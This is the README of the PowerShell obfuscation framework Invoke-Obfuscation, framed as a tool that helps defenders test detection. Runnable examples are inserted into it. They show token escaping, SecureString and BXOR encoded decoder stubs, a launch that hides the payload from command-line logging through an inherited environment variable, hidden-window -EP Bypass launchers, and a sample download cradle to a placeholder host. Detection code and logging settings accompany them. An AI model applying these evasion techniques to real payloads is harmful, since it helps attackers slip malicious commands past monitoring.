Invoke-Obfuscation v1.8

Introduction

Background

In the fall of 2015 I began researching the flexibility of PowerShell's
language and cataloguing the many different ways to accomplish a handful
of common techniques that most attackers use on a regular basis.

Initially focusing on encoded command and remote download cradle syntaxes,
I discovered that various escape characters that did not hinder execution
of the command persisted unchanged in the command line arguments, both in
the running process and in what is logged in Security Event ID 4688 and
Sysmon Event ID 1. This led me to systematically explore ways of obfuscating
each kind of "token" found in any PowerShell command or script.
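The observation above, as an added example that is not part of Invoke-Obfuscation's code: a backtick in front of an ordinary character inside a bare-word token is a no-op escape, so the parser discards it, while the raw text (ticks included) is what the process command line, Security 4688 and Sysmon 1 all record. The Add-Ticks helper and its list of escape letters to avoid are this example's own, and Write-Output / Get-Date stand in for a real download cradle.

```powershell
# Added example; not Invoke-Obfuscation's own code.

# Characters whose meaning changes after a backtick (`0 `a `b `f `n `r `t `v,
# plus `e and `u on newer PowerShell versions). Never place a tick in front of
# these. '-' is excluded as well, conservatively, so command names stay intact.
$script:UnsafeAfterTick = @('0','a','b','e','f','n','r','t','u','v','-')

function Add-Ticks {
    # Inserts up to $Count backticks at random safe positions inside a bare-word token.
    param(
        [Parameter(Mandatory)][string]$Token,
        [int]$Count = 3
    )
    if ($Token.Length -lt 2) { return $Token }
    $chars = New-Object System.Collections.Generic.List[char]
    $chars.AddRange([char[]]$Token)
    # Candidate slots: every index except 0 whose character is safe to escape.
    $slots = @(1..($chars.Count - 1) | Where-Object {
        $script:UnsafeAfterTick -notcontains [string]$chars[$_]
    })
    if ($slots.Count -eq 0) { return $Token }
    $n = [Math]::Min($Count, $slots.Count)
    # Insert from the highest index down so the lower indices stay valid.
    foreach ($i in ($slots | Get-Random -Count $n | Sort-Object -Descending)) {
        $chars.Insert($i, '`')
    }
    return -join $chars
}

# Harmless stand-in for a download cradle; the same transformation applies to
# Invoke-Expression, New-Object and DownloadString in a real one.
$obfuscated = '{0} ({1}).Year' -f (Add-Ticks 'Write-Output'), (Add-Ticks 'Get-Date')
$obfuscated                      # e.g.  Wr`ite-O`ut`put (Get-`Date).Year
Invoke-Expression $obfuscated    # still runs: the parser drops the ticks before command lookup

# A child process started with this text records the ticks verbatim in its
# CommandLine field (Security 4688 / Sysmon 1) and still executes normally.
powershell.exe -NoProfile -Command $obfuscated
```

Run it a few times: every run produces a different string on the command line for the same executed command, which is exactly the assumption a keyword-only detection makes and the tool is built to break.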

I then explored more obscure ways to perform string-level obfuscation,
various encoding/encrypting techniques (such as ASCII/hex/octal/binary and
even SecureString), and finally PowerShell launch techniques that remove
the command from the command line arguments of powershell.exe and push it
back into the parent and even grandparent process.
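Two of the ideas above in miniature, as an added example that is not Invoke-Obfuscation's own code: a command encoded as a SecureString blob (reversible because the AES key travels with the decoder) and a launch in which powershell.exe's own command line carries only a tiny stub while the payload lives in the parent process's environment block. The 16-byte key, the variable name "ps" and the Write-Output stand-in payload are this example's own choices.

```powershell
# Added example; not Invoke-Obfuscation's own code.

$payload = 'Write-Output (Get-Date).Year'   # harmless stand-in for a real command

# 1) ENCODE. A fixed 16-byte key (24 or 32 bytes also work) is embedded in the
#    decoder, so this is obfuscation, not confidentiality.
$key  = [byte[]](1..16)
$blob = ConvertTo-SecureString $payload -AsPlainText -Force |
        ConvertFrom-SecureString -Key $key   # long hex string: no IEX, New-Object or URL visible

# 2) DECODER STUB. Recovers the plaintext via the Marshal BSTR helpers and
#    hands it to Invoke-Expression. Only single quotes are used so the stub can
#    be carried inside a double-quoted -Command argument or a cmd.exe "set".
$stub = "`$s=ConvertTo-SecureString '$blob' -Key ([byte[]](1..16));" +
        "`$b=[Runtime.InteropServices.Marshal]::SecureStringToBSTR(`$s);" +
        "Invoke-Expression ([Runtime.InteropServices.Marshal]::PtrToStringBSTR(`$b));" +
        "[Runtime.InteropServices.Marshal]::ZeroFreeBSTR(`$b)"

Invoke-Expression $stub   # sanity check in the current process: prints the year

# 3) LAUNCH via the parent's environment. The child's CommandLine, which is
#    what Security 4688 and Sysmon 1 capture, is only:
#      powershell.exe -NoProfile -Command "Invoke-Expression $env:ps"
#    The stub exists only in the parent's environment block, which the child
#    inherits; the blob never appears on any command line.
$env:ps = $stub
powershell.exe -NoProfile -Command 'Invoke-Expression $env:ps'
Remove-Item Env:\ps
```

The same pattern generalizes one level further: if the parent is itself a cmd.exe launched with the variable in its own arguments, the payload sits in the grandparent's command line and the powershell.exe event shows nothing but the stub.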

Purpose

Attackers and commodity malware have started using extremely basic
obfuscation techniques to hide the majority of the command from the command
line arguments of powershell.exe. I developed this tool to aid the Blue Team
in simulating obfuscated commands, based on what I currently know to be
syntactically possible in PowerShell 2.0-5.0, so that they can test their
ability to detect these techniques.

The tool's sole purpose is to break any assumptions that we as defenders may
have concerning how PowerShell commands can appear on the command line. My
hope is that it will encourage the Blue Team to shift to looking for
Indicators of Obfuscation on the command line, in addition to updating
PowerShell logging to include Module, ScriptBlock and Transcription logging,
as these sources record code as it actually executes and so strip away most
of the obfuscation layers this tool generates.
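Both halves of that recommendation as an added example (not Invoke-Obfuscation's own code): a first-pass scorer for Indicators of Obfuscation over the CommandLine field of Security 4688 / Sysmon 1 events, run over constructed sample lines, followed by the registry policy values behind the Module, ScriptBlock and Transcription logging group policies. The indicator set, weights, threshold and transcript directory are this example's own choices, not settings from the tool or from Microsoft; the registry paths are the documented policy locations for PowerShell 5 and need an elevated prompt.

```powershell
# Added example; not Invoke-Obfuscation's own code.

function Get-ObfuscationIndicators {
    # Counts cheap, high-signal artifacts of command-line obfuscation and
    # combines them into a crude score. Tune the weights against a baseline of
    # your own benign PowerShell before alerting on it.
    param([Parameter(Mandatory)][string]$CommandLine)
    $c = $CommandLine
    $ind = [ordered]@{
        Backticks    = ([regex]::Matches($c, '`')).Count                            # token-level escapes
        Carets       = ([regex]::Matches($c, '\^')).Count                           # cmd.exe-level escapes
        StringPlus   = ([regex]::Matches($c, "'\s*\+\s*'")).Count                   # 'Inv'+'oke' concatenation
        CharCasts    = ([regex]::Matches($c, '\[char\]', 'IgnoreCase')).Count       # [char]73+[char]69...
        JoinOrFormat = ([regex]::Matches($c, '-(join|f)\b', 'IgnoreCase')).Count    # reassembly operators
        CaseFlips    = ([regex]::Matches($c, '[a-z][A-Z]')).Count                   # iNvOkE-style case mixing
        EncodedFlag  = [int]($c -match '\s-(e|ec|en|enc|encodedcommand)\s')
        HiddenWindow = [int]($c -match '\s-w(indowstyle)?\s+(1|h(idden)?)\b')
    }
    $ind.Score = $ind.Backticks * 2 + $ind.Carets * 2 + $ind.StringPlus * 3 +
                 $ind.CharCasts * 2 + $ind.JoinOrFormat +
                 [Math]::Max(0, $ind.CaseFlips - 3) +        # PascalCase gives a few flips for free
                 $ind.EncodedFlag * 2 + $ind.HiddenWindow * 2
    $ind.Suspicious  = ($ind.Score -ge 5)
    $ind.CommandLine = $c
    [pscustomobject]$ind
}

# Constructed sample CommandLine values (not real telemetry): one benign, two obfuscated.
$samples = @(
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell.exe -nop -w 1 -c "Inv`oke-Ex`pression (Ne`w-Ob`ject Net.WebClient).Down`loadString(''http://example.invalid/a'')"',
    'powershell.exe -NoP -W hidden -C "&(''Invo''+''ke-Expre''+''ssion'') (''Ge''+''t-Da''+''te'')"'
)
$samples | ForEach-Object { Get-ObfuscationIndicators $_ } |
    Format-Table Score, Suspicious, Backticks, StringPlus, CaseFlips, HiddenWindow -AutoSize

# Policy values behind the GPO settings "Turn on Module Logging", "Turn on
# PowerShell Script Block Logging" and "Turn on PowerShell Transcription".
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
New-Item "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
New-ItemProperty "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null
New-Item "$base\Transcription" -Force | Out-Null
Set-ItemProperty "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
Set-ItemProperty "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts'   # use a write-only share in practice
```

With the policies above in place, the first sample would also produce a 4104 ScriptBlock event, and the second would yield two: the ticked cradle as typed, and then the plain DownloadString call once Invoke-Expression runs it, which is the point of pairing command-line indicators with ScriptBlock logging.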

Usage

While all of the layers of obfuscation have been built out as separate
scripts, most users will find the Invoke-Obfuscation function to be the
easiest way to explore and visualize the obfuscation techniques that this
framework currently supports.

Installation

The source code for Invoke-Obfuscation is hosted on GitHub; you can
download, fork and review it from the repository at
https://github.com/danielbohannon/Invoke-Obfuscation. Please report issues
or feature requests through the project's GitHub issue tracker.

v1.4 - 2016-10-28 BruCON (Ghent, Belgium): Added new BXOR ENCODING function. Also enhanced
randomized case for all components of all ENCODING functions as well as for
PowerShell execution flags for all LAUNCHERs. Finally, added -EP shorthand option
for -ExecutionPolicy to all LAUNCHERs as well as the optional integer representation
of the -WindowStyle PowerShell execution flag: Normal (0), Hidden (1), Minimized (2),
Maximized (3).
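The three v1.4 items above in miniature, as an added example that is not Invoke-Obfuscation's own code: a BXOR encoding with the decoder stub that reverses it, randomized case on the launcher's execution flags, and the -EP / -W 1 shorthands. The single-byte key, the helper names and the Write-Output stand-in payload are this example's own; the tool's BXOR function is more elaborate than this.

```powershell
# Added example; not Invoke-Obfuscation's own code.

function Get-RandomCase {
    # Flips each character to upper or lower case at random. PowerShell's
    # command-line flags are case-insensitive, so "-nOpRoFiLe" still works.
    param([Parameter(Mandatory)][string]$Text)
    -join ($Text.ToCharArray() | ForEach-Object {
        if (Get-Random -Maximum 2) { [char]::ToUpper($_) } else { [char]::ToLower($_) }
    })
}

function New-BxorStub {
    # XORs every UTF-16 code unit of $Payload with $Key and returns a one-line
    # stub that undoes the XOR at run time and pipes the result into IEX.
    param([Parameter(Mandatory)][string]$Payload, [byte]$Key = 0x5A)
    $enc = ([int[]][char[]]$Payload | ForEach-Object { $_ -bxor $Key }) -join ','
    # Nothing recognizable from the original text survives in the stub: only
    # the integer list, the key and the decoder itself.
    "(-join(($enc|ForEach-Object{[char](`$_ -bxor $Key)})))|Invoke-Expression"
}

$payload = 'Write-Output (Get-Date).Year'   # harmless stand-in for a real command
$stub    = New-BxorStub $payload -Key 0x37
$stub
Invoke-Expression $stub                      # decodes and runs in-process: prints the year

# -WindowStyle accepts the integer value of System.Diagnostics.ProcessWindowStyle,
# which is where the Normal (0) / Hidden (1) / Minimized (2) / Maximized (3)
# mapping comes from; "-W 1" therefore means "-WindowStyle Hidden".
[int][System.Diagnostics.ProcessWindowStyle]::Hidden   # 1

# Launcher with randomized flag case and the short -W / -EP forms. The flags
# differ on every run, so a detection keyed on exact flag spelling misses it.
$launcher = 'powershell.exe {0} {1} 1 {2} Bypass {3} "{4}"' -f (Get-RandomCase '-NoProfile'),
            (Get-RandomCase '-W'), (Get-RandomCase '-EP'), (Get-RandomCase '-Command'), $stub
$launcher
# cmd.exe /c $launcher   # run this to see the resulting 4688 / Sysmon 1 CommandLine
```

Note that the flag randomization and the -W 1 / -EP shorthands change nothing about what executes; they exist only to vary the command line, which is why the changelog applies them to every LAUNCHER rather than to any one encoding.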

Added base menu auto-detect functionality to avoid needing to use BACK or HOME:
E.g., if you ran TOKEN then ALL then 1, then just type LAUNCHER and you will get to
the LAUNCHER menu without needing to type HOME or BACK to get back to the home menu.